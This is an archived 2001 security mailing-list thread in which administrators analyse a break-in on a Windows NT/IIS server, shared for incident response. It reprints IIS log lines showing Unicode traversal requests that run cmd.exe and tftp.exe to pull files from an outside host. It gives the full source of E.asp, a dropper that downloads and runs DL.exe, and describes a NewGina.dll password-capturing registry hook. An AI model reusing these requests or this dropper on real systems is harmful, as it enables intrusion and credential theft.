Security Incidents mailing list archives
Re: Some details in a recent NT hack we encountered
From: Ron Grove <rgrove () HOTMAIL COM>
Date: Sun, 25 Feb 2001 22:21:11 -0700
I sent an update after this posting that explains what we found on that after some more investigation. I have appended it below your message. In short the log was created by a trojan called NewGina.dll. We knew it had to be created by something that was associated with logons so msgina.dll (or in our case awgina.dll) was a good place to start. Searching for "gina" turned up "NewGina.dll" which immediately explained what was going on and was what was creating the logs (to answer that question). Some redirection in the registry was how the intercept was pulled off. We suspect a kit, because everything about the breakin appeared to lack skill or polish. Easy to catch quickly and didn't clean anything up. With the access he had one would expect better... They used the unicode thing to load dl.exe and company. I don't know exactly where he got SYSTEM access, but I expect somehow through dl.exe? If anyone wants it it's all theirs of course. Ron I have CC:'d you because I don't know how long before this actually gets posted. The moderator appears to be (very uderstandably) less aggressive on Friday afternoons and weekends. :-) You wouldn't have seen it until Monday if it were me at the helm...
From: Gossi The Dog <gossi () OWNED LAB6 COM> Reply-To: Gossi The Dog <gossi () OWNED LAB6 COM> To: INCIDENTS () SECURITYFOCUS COM Subject: Re: Some details in a recent NT hack we encountered Date: Wed, 28 Feb 2001 21:48:23 +0000 On Sat, 24 Feb 2001, Ron Grove wrote: > Hello, > > Just wanted to share some of the footprints of a hack that we had on a <snip> Ok, three points here. First off, the IIS unicode exploit does not give you SYSTEM or Administrator privs. So how are they getting those (they'll need them to make those dirs and set permissions etc). Secondly, what program is generating those WinLogon logs? Not seen that before at all, very interesting. Thirdly, could this be a worm? If it is, erm, eek. Regards, Gossi.
Just wanted to share some of the footprints of a hack that we had on one of our NT servers. This is not everything I am sure. It was too important to rebuild and secure the server for the users usage again. If anyone else has noticed this please let me know. We are curious what else was put on the machine beyond what we found. Attempts were made against other servers as well. Config: Windows NT 4.0 with SP6a Runs Exchange 5.5 SP4, IIS 4.0, MS Proxy Server 2.0 Initially noticed logfile problem with UNICODE exploit. Then noticed os2srv.exe running in taskmanager and as a service. os2srv.exe was then killed and sud.exe appeared out of nowhere in processes. Can't find sud.exe so find is possibly trojaned. They initially got in with the UNICODE exploit from a few months back. Here is the snip from the logs: xxx.xxx.xxx.xxx, -, 2/15/01, 20:41:28, W3SVC1, OURSERVER, xxx.xxx.xxx.xxx, 234, 140, 1650, 200, 0, GET, /scripts/../../winnt/system32/cmd.exe, /c+dir+c:\, xxx.xxx.xxx.xxx, -, 2/15/01, 20:41:54, W3SVC1, OURSERVER, xxx.xxx.xxx.xxx, 188, 141, 379, 502, 0, GET, /scripts/../../winnt/system32/attrib.exe, E.asp+-r, xxx.xxx.xxx.xxx, -, 2/15/01, 20:42:20, W3SVC1, OURSERVER, xxx.xxx.xxx.xxx, 16, 142, 396, 502, 0, GET, /scripts/../../winnt/system32/cmd.exe, /c+del+E.asp, xxx.xxx.xxx.xxx, -, 2/15/01, 20:42:26, W3SVC1, OURSERVER, xxx.xxx.xxx.xxx, 2265, 163, 415, 502, 0, GET, /scripts/../../winnt/system32/tftp.exe, -i+rooted.ntserver.com+get+E.asp, xxx.xxx.xxx.xxx, -, 2/15/01, 20:42:34, W3SVC1, OURSERVER, xxx.xxx.xxx.xxx, 1781, 101, 225, 200, 0, GET, /scripts/E.asp, -, xxx.xxx.xxx.xxx, -, 2/15/01, 20:42:37, W3SVC1, OURSERVER, xxx.xxx.xxx.xxx, 15, 196, 355, 502, 0, GET, /scripts/../../winnt/system32/attrib.exe, E.asp+-r, xxx.xxx.xxx.xxx, -, 2/15/01, 20:42:41, W3SVC1, OURSERVER, xxx.xxx.xxx.xxx, 15, 197, 355, 502, 0, GET, /scripts/../../winnt/system32/cmd.exe, /c+del+E.asp, We contacted the source IP who had been contacted by another attacked site. A CERT report was already generated by the other party. The text of E.asp is: <% Set fs = CreateObject("Scripting.FileSystemObject") Set drv = fs.Drives dmax = "" dmac = 0 For each d in drv If d.Driveletter <> "A" And d.IsReady Then If d.AvailableSpace > dmac then dmac = d.AvailableSpace dmab = d.DriveType dmaa = d.TotalSize dmad = d.SerialNumber dmax = d.DriveLetter End If End If Next filename = server.mappath("dl.bat") Set tf = fs.CreateTextFile(filename, True) tf.WriteLine("@echo off") tf.WriteLine("cd \Inetpub\scripts") tf.WriteLine("startDL:") tf.WriteLine("tftp.exe -i 216.205.125.115 get DL.exe") tf.WriteLine("if not exist DL.exe goto startDL") tf.WriteLine("start /w DL.exe") tf.WriteLine("ren 00.D install.bat") tf.WriteLine("attrib TFTP* -r") tf.WriteLine("attrib DL.exe -r") tf.WriteLine("del TFTP*") tf.WriteLine("del DL.exe") tf.WriteLine("install.bat %1") tf.WriteLine("exit") tf.Close dim command dim wshShell command = server.mappath("dl.bat") & " " & dmax On Error Resume Next Set wshShell = CreateObject("WScript.Shell") wshShell.Run (command) If Err Then Set objFSO = Server.CreateObject("scripting.filesystemobject") pathname = server.mappath("dl.bat") objFSO.DeleteFile pathname Set objFSO = Nothing Else Response.Write "|" & dmax & "*" & dmab & "*" & dmac & "*" & dmaa & "*" & dmad End If %> ---------------------------- This file downloads DL.exe from the remote host, executes it (which uncompresses a group of files) then runs an install. A directory listing follows: ----------------------------- 09/24/1997 12:06a 1,942 environ.ksh 09/24/1997 12:06a 1,323 profile.ksh 02/20/2001 04:52p 1,289 E.asp 02/20/2001 05:11p 5,120 DL.exe 02/20/2001 05:12p 2,201 00.D 02/20/2001 05:12p 64 01.D 02/20/2001 05:12p 32,256 02.D 02/20/2001 05:12p 344 03.D 02/20/2001 05:12p 349,696 04.D 02/20/2001 05:12p 28,672 05.D 02/20/2001 05:12p 24,576 06.D 02/20/2001 05:12p 70,211 07.D 02/20/2001 05:12p 18,276 08.D 02/20/2001 05:12p 28,432 09.D 02/20/2001 05:12p 35,981 10.D 02/20/2001 05:12p 427,520 11.D 02/20/2001 05:12p 12,288 12.D 02/20/2001 05:12p 6,867 13.D 00.D gets renamed to install.bat, then executed. A new directory also appears about this time. It is found in a different drive (in our case E:\ since D:\ was the CDROM). It is under a new directory call E:\Adminback0801\root\system\dll and nothing is in it. In the C:\Winnt\System32\os2\ directory a new hidden folder called "New" was present. I contained: FireDaemon.exe dir.txt login.txt RemScan.txt SUD.exe SUD.bak It's security was set to SYSTEM Full Access. FireDaemon was used to create an INDEX service and a OS2SRV service. A trojan .dll was placed in C:\Winnt\System32 called NewGina.dll. HKLM/Software/Windows NT/Software/Winlogon/NewGina key was created with the path to the NewGina trojan. A key called OriginalGinaDll was created with pcAnywhere's awgina.dll entry. NewGina.dll creates a .tmp file on C:\ that captures logon passwords. It is appended to with the current password after every logon so that changed passwords are also caught. The file is formatted and produced by the NewGina.dll and contains the following text: WlxNegotiate. WlxInitialize. WlxDisplaySASNotice. WlxLoggedOutSAS, SasType=1. WlxDisplaySASNotice. WlxDisplaySASNotice. WlxLoggedOutSAS, SasType=1. user Administrator has logged on to domain OURSERVER with password CURRENT_ADMIN_PASSWORD. user is a member of the Administrators group. returned profile information: type 2 profile path: (null) policy path: \\OURSERVER\netlogon\ntconfig.pol server: \\OURSERVER LOGONSERVER=\\OURSERVER WlxActivateUserShell. WlxLoggedOnSAS, SasType=1. WlxDisplayLockedNotice. WlxWkstaLockedSAS, SasType=1. WlxLoggedOnSAS, SasType=1. WlxDisplayLockedNotice. WlxIsLockOk. WlxDisplayLockedNotice. WlxIsLockOk. WlxDisplayLockedNotice. WlxWkstaLockedSAS, SasType=1. WlxLoggedOnSAS, SasType=1. WlxDisplayLockedNotice. WlxIsLockOk. WlxDisplayLockedNotice. WlxWkstaLockedSAS, SasType=1. WlxLoggedOnSAS, SasType=1. A new ftp server is also installed called UServ or something like that (I forget right now). Too much to try to clean so rebuilding and securing is probably the best route. Hope this helps someone. Thanks, Ron _________________________________________________________________ Get your FREE download of MSN Explorer at http://explorer.msn.com
Current thread:
- Some details in a recent NT hack we encountered Ron Grove (Feb 24)
- Re: Some details in a recent NT hack we encountered Gossi The Dog (Feb 24)
- <Possible follow-ups>
- Re: Some details in a recent NT hack we encountered Matt Scarborough (Feb 25)
- Re: Some details in a recent NT hack we encountered Gossi The Dog (Feb 26)
- Re: Some details in a recent NT hack we encountered Matt Scarborough (Feb 25)
- Re: Some details in a recent NT hack we encountered Ron Grove (Feb 25)
- Re: Some details in a recent NT hack we encountered Matt Scarborough (Feb 26)
- Re: Some details in a recent NT hack we encountered Matt Scarborough (Feb 27)
- Re: Some details in a recent NT hack we encountered Gossi The Dog (Feb 28)